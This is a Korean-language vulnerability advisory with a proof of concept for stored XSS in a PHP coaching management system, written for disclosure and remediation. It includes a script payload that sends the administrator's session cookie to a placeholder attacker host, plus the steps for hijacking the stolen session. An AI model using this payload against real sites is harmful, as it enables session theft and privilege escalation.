
PHP 기반 코칭 관리 시스템에서 저장형 XSS (CWE-79)에 대한 개념 증명 익스플로잇으로, 쿠키 탈취를 통해 학생에서 관리자로의 세션 하이재킹 및 권한 상승을 보여줍니다.
PHP 기반 코칭 관리 시스템 (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/
알 수 없음 (공급업체에서 버전 정보를 제공하지 않음; 2026년 4월 기준 Code-Projects.org의 최신 버전에서 테스트)
CWE-79: 웹 페이지 생성 중 입력 처리 부적절 (저장형 크로스 사이트 스크립팅)
애플리케이션이 불만 및 답변 기능에서 사용자 제공 입력을 적절히 살균(sanitize)하지 않습니다. 낮은 권한의 사용자가 주입한 악성 JavaScript가 저장되고, 관리자나 교사와 같은 높은 권한의 사용자가 볼 때 실행됩니다.
또한 답변 기능도 취약하여, 관리자나 교사가 학생 세션에서 실행되는 JavaScript를 주입할 수 있습니다.
이로 인해 여러 사용자 역할에 영향을 미치는 저장형 XSS 취약점이 발생합니다.
학생으로 로그인
다음으로 이동:
/modules/student/complaint.php

다음 페이로드로 불만을 제출합니다:
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>

관리자로 로그인
다음으로 이동:
/modules/admin/incomingcomplaint.php

관리자가 불만을 열람하면 페이로드가 자동으로 실행됩니다
관리자 세션 쿠키가 공격자 제어 서버로 전송됩니다
탈취한 세션 쿠키를 사용하여 관리자 세션을 가로챕니다

심각도: 치명적(Critical)
htmlspecialchars()와 같은 함수를 사용하여 출력을 인코딩하십시오.